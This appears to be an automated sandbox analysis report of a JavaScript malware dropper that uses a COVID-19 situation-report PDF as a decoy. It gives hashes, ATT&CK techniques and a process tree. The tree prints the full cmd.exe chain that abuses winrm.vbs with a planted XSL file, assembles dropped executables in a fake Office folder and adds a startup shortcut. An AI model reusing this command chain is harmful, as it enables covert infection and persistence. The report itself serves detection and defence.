f74199f59533fbbe57f0b2aae45c837b3ed5e4f5184e74c02e06c12c6535f0f9

General

Target

9sOXN6Ltf0afe7.js
Size

792B
MD5

4f8ff5e70647dbc5d91326346c393729
SHA1

2fd4eb78e53af6a5b210943ca8f0e521bb567afb
SHA256

70b8397f87e4a0d235d41b00a980a8be9743691318d30293f7aa6044284ffc9c
SHA512

70befa1aaebca808fab2f3538897380b8ad988106eab300dfe4063e1a6933ce77ff01949f99e5741ac8ffb0653e65b946de4f87e5a035926b18bfb3e5e4ec2ef

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

msproof.exe

pid process

616 msproof.exe
Drops startup file 1 IoCs

Processes:

msproof.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Accessories.lnk msproof.exe
Loads dropped DLL 2 IoCs

Processes:

cmd.exe

pid process

868 cmd.exe
868 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1308 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

AcroRd32.exe

pid process

1596 AcroRd32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

1596 AcroRd32.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

AcroRd32.exe

pid process

1596 AcroRd32.exe
1596 AcroRd32.exe
1596 AcroRd32.exe
1596 AcroRd32.exe

pid	process
616	msproof.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Accessories.lnk	msproof.exe

pid	process
868	cmd.exe
868	cmd.exe

pid	process
1308	PING.EXE

pid	process
1596	AcroRd32.exe

pid	process
1596	AcroRd32.exe

pid	process
1596	AcroRd32.exe
1596	AcroRd32.exe
1596	AcroRd32.exe
1596	AcroRd32.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

wscript.execmd.exe

description	pid	process	target process
PID 1904 wrote to memory of 868	1904	wscript.exe	cmd.exe
PID 1904 wrote to memory of 868	1904	wscript.exe	cmd.exe
PID 1904 wrote to memory of 868	1904	wscript.exe	cmd.exe
PID 868 wrote to memory of 616	868	cmd.exe	msproof.exe
PID 868 wrote to memory of 616	868	cmd.exe	msproof.exe
PID 868 wrote to memory of 616	868	cmd.exe	msproof.exe
PID 868 wrote to memory of 1308	868	cmd.exe	PING.EXE
PID 868 wrote to memory of 1308	868	cmd.exe	PING.EXE
PID 868 wrote to memory of 1308	868	cmd.exe	PING.EXE
PID 868 wrote to memory of 1596	868	cmd.exe	AcroRd32.exe
PID 868 wrote to memory of 1596	868	cmd.exe	AcroRd32.exe
PID 868 wrote to memory of 1596	868	cmd.exe	AcroRd32.exe
PID 868 wrote to memory of 1596	868	cmd.exe	AcroRd32.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\9sOXN6Ltf0afe7.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Users\Admin\AppData\Local\Temp\cscript.exe&for /r C:\Windows\System32\ %m in (cscr*.exe) do copy %m C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe /y&move /Y C:\Users\Admin\AppData\Local\Temp\cSi1r0uywDNvDu.tmp C:\Users\Admin\AppData\Local\Temp\cscript.exe\WsmPty.xsl&C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty&del "C:\Users\Admin\OFFICE12\Wordcnvpxy.exe" /f /q&ping -n 1 127.0.0.1&move /Y C:\Users\Admin\AppData\Local\Temp\486AULMsOPmf6W.tmp "C:\Users\Admin\OFFICE12\MSOSTYLE.EXE"&move /Y C:\Users\Admin\AppData\Local\Temp\3UDBUTNY7YstRc.tmp "C:\Users\Admin\OFFICE12\OINFO12.OCX"&copy /b C:\Users\Admin\AppData\Local\Temp\2m7EBxdH3wHwBO.tmp+C:\Users\Admin\AppData\Local\Temp\MiZl5xsDRylf0W.tmp "C:\Users\Admin\OFFICE12\Wordcnvpxy.exe" /Y&"C:\Users\Admin\AppData\Local\Temp\20200308-sitrep-48-covid-19.pdf"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:868
- - C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe
    C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty
    3⤵
    - Executes dropped EXE
    - Drops startup file
    PID:616
- - C:\Windows\system32\PING.EXE
    ping -n 1 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1308
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\20200308-sitrep-48-covid-19.pdf"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:1596

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2m7EBxdH3wHwBO.tmp

MD5
82bef32153657dc25dc439a3b500a614

SHA1
19bf94401f243d24229767920362e96d4037edd6

SHA256
d14214e95c9d1ea850e508dfe27928494f2155a7597e4ea0bad9f70690abb397

SHA512
7e19a7ed63047ff686f96ff30fb68640f081f7c262a39d546f355446df74aed4ad7e7edf16384e2a8239fa189aeab46f446b3601f9f0734c6f908ba7a9101b0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
memory/1596-63-0x0000000074F01000-0x0000000074F03000-memory.dmp

Filesize
8KB

Download
memory/1904-54-0x000007FEFB7E1000-0x000007FEFB7E3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing